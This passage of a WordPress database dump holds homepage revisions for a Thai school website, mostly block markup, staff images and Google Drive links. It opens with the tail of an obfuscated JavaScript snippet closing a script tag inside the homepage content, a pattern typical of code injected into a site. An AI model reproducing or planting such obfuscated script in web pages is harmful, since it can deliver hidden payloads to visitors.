_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 15:31:32','2025-06-27 08:31:32','',19,'http://watprato.ssk.in.th/?p=579',0,'revision','',0),
(580,1,'2025-06-27 15:37:10','2025-06-27 08:37:10','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_8cd9a2-b3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_8cd9a2-b3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"> รางวัล\"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 170px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" 